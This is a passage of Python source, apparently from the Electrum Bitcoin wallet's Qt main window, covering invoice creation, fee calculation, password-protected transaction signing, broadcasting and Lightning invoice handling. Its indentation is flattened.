self.clear_invoice_button.clicked.connect(self.clear_receive_tab)
self.create_invoice_button = QPushButton(_('On-chain'))
self.create_invoice_button.setIcon(read_QIcon("bitcoin.png"))
self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_invoice_button)
buttons.addWidget(self.create_invoice_button)
if self.wallet.has_lightning():
self.create_lightning_invoice_button = QPushButton(_('Lightning'))
self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png"))
self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True))
buttons.addWidget(self.create_lightning_invoice_button)
grid.addLayout(buttons, 4, 3, 1, 2)
self.receive_address_e = ButtonsTextEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
self.receive_qr = QRCodeWidget(fixedSize=230)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_requests_label = QLabel(_('Incoming payments'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
self.receive_widgets = QTabWidget()
self.receive_widgets.addTab(self.receive_qr, 'QR Code')
self.receive_widgets.addTab(self.receive_address_e, 'Text')
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addStretch()
hbox.addWidget(self.receive_widgets)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_request(self, key):
self.wallet.delete_request(key)
self.request_list.update()
self.clear_receive_tab()
def delete_lightning_payreq(self, payreq_key):
self.wallet.lnworker.delete_invoice(payreq_key)
self.request_list.update()
self.invoice_list.update()
self.clear_receive_tab()
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(repr(e))
return
else:
return
def create_invoice(self, is_lightning):
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
expiry = self.config.get('request_expiry', 3600)
if is_lightning:
key = self.wallet.lnworker.add_request(amount, message, expiry)
else:
key = self.create_bitcoin_request(amount, message, expiry)
self.address_list.update()
self.request_list.update()
self.request_list.select_key(key)
# clear request fields
self.receive_amount_e.setText('')
self.receive_message_e.setText('')
def create_bitcoin_request(self, amount, message, expiration):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + repr(e))
else:
self.sign_payment_request(addr)
return addr
def do_copy(self, title, content):
self.app.clipboard().setText(content)
self.show_message(_("{} copied to clipboard:\n\n{}").format(title, content))
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def clear_receive_tab(self):
self.receive_address_e.setText('')
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
def update_receive_qr(self):
uri = str(self.receive_address_e.text())
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
# note: 'addr' could be ln invoice or BIP21 URI
try:
uri = util.parse_URI(addr)
except InvalidBitcoinURI:
pass
else:
addr = uri.get('address')
if is_address(addr) and self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def set_feerounding_text(self, num_satoshis_added):
self.feerounding_text = (_('Additional {} satoshis are going to be added.')
.format(num_satoshis_added))
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(Qt.CaseInsensitive)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
self.message_e.setMinimumWidth(700)
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 3, 0)
grid.addWidget(self.amount_e, 3, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 3, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(100)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 3, 3)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 4, 0)
self.from_list = FromList(self, self.from_list_menu)
grid.addWidget(self.from_list, 4, 1, 1, -1)
self.set_pay_from([])
msg = _('Bitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
fee_rate = Decimal(fee_rate)
self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000))
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
if self.max_button.isChecked():
    self.spend_max()
else:
    self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(self.amount_e.width())
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if edit_changed.get_amount() is None:
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(self.amount_e.width())
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.') + '\n' +
_('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.'))
self.show_message(title=_('Fee rounding'), msg=text)
self.feerounding_icon = QPushButton(read_QIcon('info.png'), '')
self.feerounding_icon.setFixedWidth(round(2.2 * char_width_in_lineedit()))
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
self.feecontrol_fields = QWidget()
vbox_feecontrol = QVBoxLayout(self.feecontrol_fields)
vbox_feecontrol.setContentsMargins(0, 0, 0, 0)
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addWidget(self.feecontrol_fields, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.save_button = EnterButton(_("Save"), self.do_save_invoice)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_pay)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.save_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 4)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
#self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _("Not enough funds")
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += " ({} {} {})".format(
self.format_amount(c + u + x).strip(), self.base_unit(), _("are frozen")
)
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.set_onchain(False)
self.invoices_label = QLabel(_('Outgoing payments'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
hbox.addStretch(1)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
self.max_button.setChecked(True)
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
if not self.is_onchain:
return
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
return
outputs = self.read_outputs()
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [TxOutput(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
coins, outputs,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
self.logger.exception('')
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
if displayed_feerate is not None:
displayed_feerate = quantize_feerate(displayed_feerate)
else:
# fallback to actual fee
displayed_feerate = quantize_feerate(fee / size) if fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
self.set_feerounding_text(int(feerounding))
self.feerounding_icon.setToolTip(self.feerounding_text)
self.feerounding_icon.setVisible(abs(feerounding) >= 1)
if self.max_button.isChecked():
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
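# Fee-rounding sketch (numbers hypothetical): if the built tx pays an actual
# fee of 1_234 sat while the displayed fee is 1_230 sat, feerounding == 4, so
# the info icon becomes visible (it is shown whenever abs(feerounding) >= 1).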
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + '\t' + "%s"%x.get('address') + '\t'
for coin in self.pay_from:
item = QTreeWidgetItem([format(coin), self.format_amount(coin['value'])])
item.setFont(0, QFont(MONOSPACE_FONT))
self.from_list.addTopLevelItem(item)
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
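# Usage note for the decorator above: callers invoke decorated methods
# WITHOUT a 'password' argument, e.g. self.sign_tx(tx, callback);
# request_password() prompts (retrying until wallet.check_password accepts)
# and injects the result as kwargs['password'], or returns early on cancel.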
@protected
def protect(self, func, args, password):
return func(*args, password)
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount() # sat/byte feerate
amount = 0 if amount is None else amount * 1000 # sat/kilobyte feerate
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
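# Unit sketch: feerate_e holds sat/byte, so a user-entered 5 sat/byte becomes
# 5 * 1000 = 5000 sat/kB before being passed to estimate_fee_for_feerate.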
def read_outputs(self):
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
return outputs
def check_send_tab_onchain_outputs_and_show_errors(self, outputs) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.address is None:
self.show_error(_('Bitcoin Address is None'))
return True
if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
self.show_error(_('Invalid Bitcoin Address'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def check_send_tab_payto_line_and_show_errors(self) -> bool:
"""Returns whether there are errors.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" +
'\n'.join([_("Line #") + f"{err.idx+1}: {err.line_content[:40]}... ({repr(err.exc)})"
for err in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
return False # no errors
def pay_lightning_invoice(self, invoice):
amount_sat = self.amount_e.get_amount()
attempts = LN_NUM_PAYMENT_ATTEMPTS
def task():
try:
self.wallet.lnworker.pay(invoice, amount_sat, attempts)
except Exception as e:
self.show_error(str(e))
self.do_clear()
self.wallet.thread.add(task)
self.invoice_list.update()
def on_request_status(self, key, status):
if key not in self.wallet.receive_requests:
return
if status == PR_PAID:
self.notify(_('Payment received') + '\n' + key)
def on_invoice_status(self, key, status, log):
if key not in self.wallet.invoices:
return
self.invoice_list.update_item(key, status, log)
if status == PR_PAID:
self.show_message(_('Payment succeeded'))
self.need_update.set()
elif status == PR_FAILED:
self.show_error(_('Payment failed'))
else:
pass
def read_invoice(self):
if self.check_send_tab_payto_line_and_show_errors():
return
if not self.is_onchain:
invoice = self.payto_e.lightning_invoice
if not invoice:
return
if not self.wallet.lnworker:
self.show_error(_('Lightning is disabled'))
return
return self.wallet.lnworker.parse_bech32_invoice(invoice)
else:
outputs = self.read_outputs()
if self.check_send_tab_onchain_outputs_and_show_errors(outputs):
return
message = self.message_e.text()
return self.wallet.create_invoice(outputs, message, self.payment_request, self.payto_URI)
def do_save_invoice(self):
invoice = self.read_invoice()
if not invoice:
return
self.wallet.save_invoice(invoice)
self.do_clear()
self.invoice_list.update()
def do_preview(self):
self.do_pay(preview=True)
def do_pay(self, preview=False):
invoice = self.read_invoice()
if not invoice:
return
if not preview:
self.wallet.save_invoice(invoice)
self.invoice_list.update()
self.do_pay_invoice(invoice, preview)
def do_pay_invoice(self, invoice, preview=False):
if invoice['type'] == PR_TYPE_LN:
self.pay_lightning_invoice(invoice['invoice'])
return
elif invoice['type'] == PR_TYPE_ONCHAIN:
message = invoice['message']
outputs = invoice['outputs']
else:
raise Exception('unknown invoice type')
if run_hook('abort_send', self):
return
outputs = [TxOutput(*x) for x in outputs]
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
self.show_message(str(e))
return
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
except BaseException as e:
self.logger.exception('')
self.show_message(str(e))
return
amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x: x.value, outputs))
fee = tx.get_fee()
use_rbf = bool(self.config.get('use_rbf', True))
if use_rbf:
tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error('\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
]))
return
if preview:
self.show_transaction(tx, message)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > feerate_warning * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
self.do_clear()
if not tx.is_complete():
self.show_transaction(tx)
else:
self.broadcast_transaction(tx, message)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
if pr and status is True:
key = pr.get_id()
#self.wallet.set_invoice_paid(key, tx.txid())
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
@protected
def open_channel(self, *args, **kwargs):
def task():
return self.wallet.lnworker.open_channel(*args, **kwargs)
def on_success(chan):
n = chan.constraints.funding_txn_minimum_depth
message = '\n'.join([
_('Channel established.'),
_('Remote peer ID') + ': ' + chan.node_id.hex(),
_('This channel will be usable after {} confirmations').format(n)
])
self.show_message(message)
def on_failure(exc_info):
type_, e, traceback = exc_info
self.show_error(_('Could not open channel: {}').format(e))
WaitingDialog(self, _('Opening channel...'), task, on_success, on_failure)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.wallet.delete_invoice(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = pr.get_id()
invoice = self.wallet.get_invoice(key)
if invoice and invoice['status'] == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def parse_lightning_invoice(self, invoice):
"""Parse ln invoice, and prepare the send tab for it."""
from electrum.lnaddr import lndecode, LnDecodeException
try:
lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
except Exception as e:
raise LnDecodeException(e) from e
pubkey = bh2u(lnaddr.pubkey.serialize())
for k,v in lnaddr.tags:
if k == 'd':
description = v
break
else:
description = ''
self.payto_e.setFrozen(True)
self.payto_e.setText(pubkey)
self.message_e.setText(description)
if lnaddr.amount is not None:
